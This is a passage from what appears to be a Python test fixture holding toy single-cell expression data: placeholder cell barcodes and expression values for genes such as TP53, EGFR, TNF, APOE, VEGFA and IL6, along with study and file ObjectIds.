"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Study",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TP53 Cells": {
"name": "TP53 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TP53 Expression": {
"name": "TP53 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
2.81,
2.58,
1.58,
2.0,
3.0,
2.81,
2.81,
3.0,
1.0,
1.58,
3.0,
3.0,
2.58,
1.58,
2.81,
2.81,
1.58,
1.0,
2.0,
2.0,
2.81,
2.32,
2.32,
1.0,
2.58,
3.0,
2.0,
1.58,
1.0,
2.0,
3.0,
1.58,
2.58,
2.58,
2.81,
2.32,
3.0,
1.58,
2.0,
2.81,
2.81,
2.0,
2.58,
2.32,
2.81,
2.58,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"EGFR Cells": {
"name": "EGFR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"EGFR Expression": {
"name": "EGFR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.81,
2.58,
2.0,
1.58,
3.0,
1.0,
2.0,
3.0,
2.81,
2.32,
2.0,
2.81,
2.81,
2.32,
2.0,
2.32,
2.81,
2.0,
2.81,
1.0,
2.32,
1.0,
1.58,
2.81,
2.58,
2.81,
2.0,
3.0,
3.0,
3.0,
1.58,
2.58,
1.0,
3.0,
2.81,
2.32,
3.0,
2.81,
2.0,
1.58,
2.58,
2.0,
2.58,
2.81,
3.0,
2.32,
2.81,
2.32,
2.58,
2.0,
2.0,
2.58,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TNF Cells": {
"name": "TNF Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TNF Expression": {
"name": "TNF Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
1.0,
2.32,
3.0,
2.0,
2.58,
2.58,
1.58,
2.81,
2.58,
2.81,
2.32,
2.32,
2.32,
2.32,
3.0,
3.0,
2.81,
3.0,
1.0,
3.0,
2.32,
2.81,
1.58,
2.58,
3.0,
2.0,
2.0,
3.0,
1.58,
1.0,
2.81,
2.0,
1.58,
1.58,
2.58,
2.32,
2.0,
3.0,
2.81,
2.0,
2.81,
2.58,
2.0,
2.0,
2.0,
2.81,
3.0,
2.81,
2.58,
1.58,
1.58,
1.0,
3.0,
2.58,
1.0,
2.81,
2.32,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"APOE Cells": {
"name": "APOE Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"APOE Expression": {
"name": "APOE Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.0,
1.0,
1.0,
2.58,
1.0,
2.0,
2.32,
2.58,
2.58,
2.58,
2.81,
2.0,
2.32,
2.58,
2.0,
2.0,
1.0,
2.0,
2.58,
2.32,
3.0,
2.0,
2.32,
1.0,
2.32,
1.0,
1.0,
1.0,
3.0,
1.58,
2.32,
2.0,
2.58,
3.0,
2.58,
1.0,
2.58,
2.0,
1.58,
2.58,
2.0,
2.81,
2.81,
1.58,
3.0,
2.81,
2.81,
1.58,
2.81,
1.0,
2.81,
2.0,
2.58,
3.0,
2.81,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"VEGFA Cells": {
"name": "VEGFA Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"VEGFA Expression": {
"name": "VEGFA Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
2.0,
2.81,
2.58,
1.0,
3.0,
2.32,
1.0,
1.58,
2.81,
3.0,
3.0,
2.81,
2.81,
1.0,
2.81,
1.0,
2.32,
2.58,
3.0,
2.81,
2.58,
2.58,
2.0,
1.0,
2.32,
2.58,
2.32,
2.0,
1.0,
1.0,
1.0,
1.0,
3.0,
3.0,
3.0,
2.58,
2.81,
1.0,
3.0,
2.81,
2.58,
2.81,
3.0,
2.0,
2.32,
1.0,
3.0,
2.81,
1.58,
1.58,
3.0,
2.0,
2.58,
2.0,
1.0,
2.0,
2.81,
3.0,
1.0,
2.0,
2.81,
2.32,
3.0,
2.81,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL6 Cells": {
"name": "IL6 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
